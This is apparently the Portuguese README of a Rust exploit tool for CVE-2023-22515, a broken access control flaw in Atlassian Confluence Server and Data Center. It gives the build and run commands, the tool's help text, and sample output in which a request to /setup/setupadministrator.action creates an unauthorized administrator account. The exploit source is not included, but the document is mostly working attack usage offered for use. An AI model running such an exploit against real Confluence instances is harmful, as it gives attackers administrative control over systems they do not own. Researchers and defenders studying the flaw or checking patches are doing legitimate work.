
Exploit baseado em Rust para CVE-2023-22515 que cria contas de administrador não autorizadas no Confluence Server e Data Center por meio de controle de acesso quebrado.
Confluence é um wiki empresarial baseado na web desenvolvido pela empresa australiana de software Atlassian. A Atlassian foi informada de um problema relatado por alguns clientes em que atacantes externos podem ter explorado uma vulnerabilidade anteriormente desconhecida em servidores Confluence e instâncias de data center acessíveis publicamente para criar contas de administrador do Confluence não autorizadas e acessar instâncias do Confluence.
A vulnerabilidade foi classificada como CVE-2023-22515
Primeiro, realize a compilação com o comando:
cargo build --release
Você pode fazer isso de duas maneiras:
cargo run -- --target http://localhost --username "teste" --password "teste"
.\target\release\cve_2023_22515 --target http://localhost --username "teste" --password "teste"
Isso exibirá a ajuda da ferramenta. Aqui estão todas as opções suportadas:
CVE-2023-22515
Usage: CVE_2023_22515 --target <TARGET> --username <USERNAME> --password <PASSWORD>
Options:
-t, --target <TARGET> Insert target
-u, --username <USERNAME> Insert username
-p, --password <PASSWORD> Insert password
-h, --help Print help
cargo run -- --target http://example.com --username "teste" --password "teste"
[!] Request for: http://example.com/setup/setupadministrator.action
[!] Creating Administrator account
[!] Checking the answer
[+] Username created successfully: teste
[+] Password created successfully: teste
[+] Exploit ending successfully!!